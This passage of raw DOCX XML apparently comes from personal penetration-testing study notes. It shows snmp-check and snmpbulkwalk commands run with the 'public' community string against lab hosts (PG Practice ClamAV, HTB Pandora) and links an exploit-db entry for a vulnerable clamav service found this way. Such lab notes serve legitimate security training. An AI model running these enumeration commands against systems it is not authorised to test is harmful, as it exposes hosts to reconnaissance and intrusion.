      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" is the biggest one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yvb16ppsthnm" w:id="433"/>
      <w:bookmarkEnd w:id="433"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A6">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">My favorite tool because of how nicely formatted it is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check 192.168.118.149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will give you a BUNCH of output formatted really nice like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Routing information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP connections and listening ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listening UDP ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Processes (running processes, like ps aux)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Software components (installed applications)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check 192.168.118.149 &gt; snmp-check.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I like to save to text file and then copy and paste it into sublime text on my windows host since it is so much easier to look through output on my windows host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check 192.168.118.149 -c public -p 61 -v 1 &gt; snmp-check.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1355"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same as the command above but I just included flag to show how to use flags</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1084">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ClamAV</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="889000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="356" name="image349.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image349.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1085"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="88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0BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1465"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check gives a BUNCH of information like host info and system info and processes. And here, they found a process (clamav) which is vulnerable </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1465"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Turns out (from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1086">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup) we could also find this exploit from SMTP version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1465"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId1087">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/4761</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pl5tzoh1z3nw" w:id="434"/>
      <w:bookmarkEnd w:id="434"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpbulkwalk </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C5">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's faster if you use v2 or v2c rather than v1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1088">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ClamAV</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpbulkwalk -c public -v2c 192.168.164.42 .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember to keep the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" at the end which tells it to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> start from root OID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> retrieves all SNMP data available via SNMPv2c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from host 192.168.164.42 using community string public.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Faster than snmpwalk </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In both </w:t>
      </w:r>
      <w:hyperlink r:id="rId1089">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pandora</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB (14:00 minute mark) and </w:t>
      </w:r>
      <w:hyperlink r:id="rId1090">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
